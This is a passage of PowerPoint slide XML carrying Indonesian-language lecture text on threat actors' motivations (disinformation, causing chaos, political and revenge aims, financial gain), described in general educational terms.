            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjualnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Disinformasi-memalsukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanipulasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyuntikkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Motivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kekacauan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Pada masa-masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disinformasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekacauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Peretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melepaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> worm yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhenti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peretasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepentingannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disinformasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>politik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lanjut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> negara-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bangsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termotivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>balas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dendam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>balas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dendam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mantan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Motivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Finansial</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peretasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>canggih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikomersialkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peluang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> demi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuntungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>finansial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tumbuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
